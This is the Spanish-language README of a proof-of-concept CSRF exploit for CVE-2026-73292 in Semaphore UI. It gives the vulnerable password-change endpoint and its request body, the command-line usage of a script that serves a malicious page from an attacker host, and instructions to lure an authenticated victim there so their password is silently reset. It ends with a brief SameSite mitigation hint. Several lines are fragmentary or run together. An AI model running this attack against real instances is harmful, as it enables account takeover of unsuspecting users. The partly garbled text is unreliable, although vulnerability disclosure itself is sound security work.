
Exploit de prueba de concepto para CVE-2026-73292: ataque CSRF en el endpoint de cambio de contraseña de Semaphore UI, que sirve una página maliciosa que restablece silenciosamente la contraseña de un usuario autenticado.
Solo con fines educativos y de divulgación responsable.
Esta vulnerabilidad ha sido reportada en GHSA-8cj9-r88m-8945 y afecta a las versiones de semaphoreui anteriores a la 2.18.21.
El endpoint de cambio de contraseña de Semaphore UI no implementa ninguna protección CSRF:
semaphore) sin aplicación de SameSiteUna página maliciosa puede cambiar silenciosamente la contraseña de cualquier usuario autenticado que la visite.
Endpoint afectado: POST /api/users/{id}/password
{"password": "newpassword", "project_id": 1}
python poc_server.py -u http://TARGET:3000 -i USER_ID [-n NEW_PASSWORD] [-p PORT]
| Argumento | Descripción | Predeterminado |
|---|---|---|
-u / --uri | URL base de la instancia de Semaphore | obligatorio |
-i / --user_id | ID del usuario objetivo | obligatorio |
-n / --new_password | Contraseña a establecer | passwordchanged |
-p / --port | Puerto para servir la página maliciosa | 1337 |
python poc_server.py -u http://192.168.1.10:3000 -i 1 -n pwn3d -p 1337
A continuación, envía a la víctima (autenticada en Semaphore) a http://ATTACKER:1337. Su contraseña se cambia inmediatamente al cargar la página.
python poc.py -u http://TARGET:3000 -i 1
http://ATTACKER:1337/api/users/1/password que devuelve HTTP 204SameSite=Strict en la cookie de sesión